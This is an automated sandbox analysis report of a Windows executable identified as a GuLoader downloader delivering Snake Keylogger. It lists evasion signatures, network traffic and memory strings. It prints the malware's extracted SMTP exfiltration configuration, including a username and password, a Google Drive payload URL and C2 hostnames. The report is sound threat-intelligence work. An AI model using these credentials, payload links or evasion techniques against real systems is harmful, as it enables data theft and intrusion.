Edit tour

Windows Analysis Report
BtCQu5APhK.exe

Overview

General Information

Sample name:	BtCQu5APhK.exe renamed because original name is a hash value
Original sample name:	225c26cf877ca85f63e80f878609f6dd2cf2ce717d4885f88a7a442d8bee03ad.exe
Analysis ID:	1632373
MD5:	c80150383af692d52bc33e7857b5724d
SHA1:	c9fc133a61844c2abe2095f803d6c6bb2ae944d0
SHA256:	225c26cf877ca85f63e80f878609f6dd2cf2ce717d4885f88a7a442d8bee03ad
Tags:	exeVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

BtCQu5APhK.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\BtCQu5APhK.exe" MD5: C80150383AF692D52BC33E7857B5724D)

BtCQu5APhK.exe (PID: 2760 cmdline: "C:\Users\user\Desktop\BtCQu5APhK.exe" MD5: C80150383AF692D52BC33E7857B5724D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "report4log@tonicables.top", "Password": "7213575aceACE@", "Host": "tonicables.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1690708492.000000000727F000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: BtCQu5APhK.exe PID: 6908	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:01:20.495274+0100	2803305	3	Unknown Traffic	192.168.2.7	49692	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:01:15.548465+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49690	193.122.6.168	80	TCP
2025-03-07T23:01:18.392259+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49690	193.122.6.168	80	TCP
2025-03-07T23:01:21.204733+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49693	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:01:08.248611+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49688	142.250.184.206	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: BtCQu5APhK.exe

Avira: detected

Found malware configuration

Source: 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "report4log@tonicables.top", "Password": "7213575aceACE@", "Host": "tonicables.top", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: BtCQu5APhK.exe	Virustotal: Detection: 76%			Perma Link
Source: BtCQu5APhK.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: BtCQu5APhK.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49691 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.7:49688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.7:49689 version: TLS 1.2

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0040276E FindFirstFileW,	8_2_0040276E
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	8_2_00405770
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0040622B FindFirstFileW,FindClose,	8_2_0040622B

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49693 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49690 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49688 -> 142.250.184.206:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49692 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMNoy5ewjmQqnlz-9RLUqccKg7UuxNFj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1wMNoy5ewjmQqnlz-9RLUqccKg7UuxNFj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49691 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMNoy5ewjmQqnlz-9RLUqccKg7UuxNFj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1wMNoy5ewjmQqnlz-9RLUqccKg7UuxNFj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003806E000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003801F000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: BtCQu5APhK.exe, 00000008.00000002.2149763035.000000003A76C000.00000004.00000020.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: BtCQu5APhK.exe, 00000000.00000002.1679502850.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BtCQu5APhK.exe, 00000000.00000000.865676042.0000000000409000.00000008.00000001.01000000.00000003.sdmp, BtCQu5APhK.exe, 00000008.00000000.1673920858.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000038047000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: BtCQu5APhK.exe, 00000008.00000002.2130156922.00000000079C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: BtCQu5APhK.exe, 00000008.00000003.1978525498.0000000007A29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: BtCQu5APhK.exe, 00000008.00000003.1978525498.0000000007A29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/=
Source: BtCQu5APhK.exe, 00000008.00000002.2130156922.0000000007A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1wMNoy5ewjmQqnlz-9RLUqccKg7UuxNFj&export=download
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003806E000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003806E000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443

Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.7:49688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.7:49689 version: TLS 1.2

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_00403358
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		8_2_00403358

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_00404B0E	8_2_00404B0E
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0040653D	8_2_0040653D
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0763C738	8_2_0763C738
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_07636FC8	8_2_07636FC8
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_07639DE0	8_2_07639DE0
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0763C468	8_2_0763C468
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_07635362	8_2_07635362
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0763CA08	8_2_0763CA08
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0763C146	8_2_0763C146
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_076369A0	8_2_076369A0
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_07633E09	8_2_07633E09
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_07633AB3	8_2_07633AB3
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_076329EC	8_2_076329EC

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Code function: String function: 00402B38 appears 47 times

Source: BtCQu5APhK.exe, 00000000.00000002.1679602011.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs BtCQu5APhK.exe
Source: BtCQu5APhK.exe, 00000008.00000000.1673942761.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs BtCQu5APhK.exe

Source: BtCQu5APhK.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/30@4/4

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne

Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsx7B95.tmp

Jump to behavior

Source: BtCQu5APhK.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BtCQu5APhK.exe	Virustotal: Detection: 76%
Source: BtCQu5APhK.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

File read: C:\Users\user\Desktop\BtCQu5APhK.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\BtCQu5APhK.exe "C:\Users\user\Desktop\BtCQu5APhK.exe"
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process created: C:\Users\user\Desktop\BtCQu5APhK.exe "C:\Users\user\Desktop\BtCQu5APhK.exe"
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process created: C:\Users\user\Desktop\BtCQu5APhK.exe "C:\Users\user\Desktop\BtCQu5APhK.exe"	Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: winhttp.dll	Jump to behavior
